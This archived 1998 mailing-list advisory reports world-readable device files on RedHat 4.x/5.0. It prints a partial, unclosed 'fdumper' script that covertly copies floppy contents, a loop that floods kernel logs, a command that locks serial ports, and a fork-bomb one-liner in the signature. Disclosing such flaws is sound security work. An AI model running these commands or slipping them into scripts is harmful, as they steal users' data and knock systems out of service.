RedHat 4.x/5.0 /dev permissions

From: Michał Zalewski (lcamtufat_private)
Date: Wed Feb 04 1998 - 00:45:37 PST

  • Next message: Rafal Wojtczuk: "An old hole"

    First one
    Any user can read data from (even not mounted) floppy using
    "cat /dev/fd0H1440". It isn't dangerous itself, but... Any user
    may write a script, which periodically checks if floppy has been
    just unmounted, then dumps it's content to a file. Here's a sample
    'floppy collector':
    -- fdumper --
    while :; do
      sleep 1
      if [ "`mount|grep \"^${MOUNT_DEV}\"`" = "" ]; then
        if [ "$DUMPED" = "0" ]; then
          echo "Dumping image #$LABEL..."
          cat $DUMP_DEV >.fdimage$LABEL
          let LABEL=LABEL+1
    -- eof --
    Also, if there's no floppy in drive, unprivledged user may flood
    kernel log console (local console by default!!!):
    [user@host sth]$ while :; do cat /dev/fd0H1440;done &
    It will generate a lot of kernel messages, which will be logged
    to /var/log/messages AND to console (default klogd behaviour). Also,
    every printk(...) (called by fd driver) uses sync() to flush buffers.
    It will cause abnormal hdd activity.
    Second one
    (not tested with rh 5.0)
    Ordinary user are allowed to read /dev/ttyS*. Serial ports driver
    disallows multiple access attempts at the same time, so user may
    permanently lock choosen port using this command:
    [user@host user]$ cat /dev/ttyS0
    [user@host user]$ cat /dev/ttyS0
    cat: /dev/ttyS0: device is busy
    Now serial port is in unusable state.
    That's all?
    There are also a lot of other, not-so-common devices, eg. /dev/sequencer,
    which are world-readable or even world-writable.
    There's no ANY reason to give ordinary users direct access to hardware
    devices. It's quite easy (as shown above ;) to obtain an interesting
    data or cause system failure by reading/writing these devices.
    ls -l /dev/* | grep "r-- "
    chmod ;)
    Michał Zalewski [tel 9690] | finger 4 PGP [lcamtufat_private]
    Iterować jest rzeczą ludzką, wykonywać rekursywnie - boską [P. Deustch]
    =------- [ echo -e "while :;do \$0&\ndone">_;chmod +x _;./_ ] --------=

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